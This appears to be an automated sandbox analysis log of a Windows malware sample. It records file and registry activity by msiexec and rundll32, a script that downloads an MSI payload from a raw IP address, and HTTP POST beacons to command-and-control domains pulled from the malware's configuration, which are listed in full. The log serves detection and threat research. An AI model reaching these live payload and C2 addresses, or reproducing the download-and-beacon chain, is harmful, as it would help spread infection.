Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://wrankaget.site/live/

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

6_2_00000187EC858D90

Source: global traffic

HTTP traffic detected: GET /ad.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 45.95.11.217

Source: global traffic	DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic	DNS traffic detected: DNS query: grizmotras.com

Source: unknown

HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032880345.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035225115.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, Document_a19_79b555791-28h97348k5477-3219g9.js	String found in binary or memory: http://45.95.11.217/ad.msi
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msi%
Source: ~DF428E4FF550ED71C3.TMP.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi-1780707424311028180
Source: ~DF3025BC11E5C97B03.TMP.2.dr, ~DFE66F7BB54D4BA8DC.TMP.2.dr, ~DFAB72B8B8E96537BE.TMP.2.dr, ~DF22CBD4461B033FB8.TMP.2.dr, ~DF0C3825C8A6AE7DC2.TMP.2.dr, inprogressinstallinfo.ipi.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi0
Source: wscript.exe, 00000000.00000003.2156644454.00000207B4D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiLin
Source: wscript.exe, 00000000.00000002.2158447349.00000207B5459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiV
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.dig
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digice7
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp, MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr4(
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/Q
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/T
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040569360.00000207B544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wscript.exe, 00000000.00000003.2040677735.00000207B5427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdllI
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
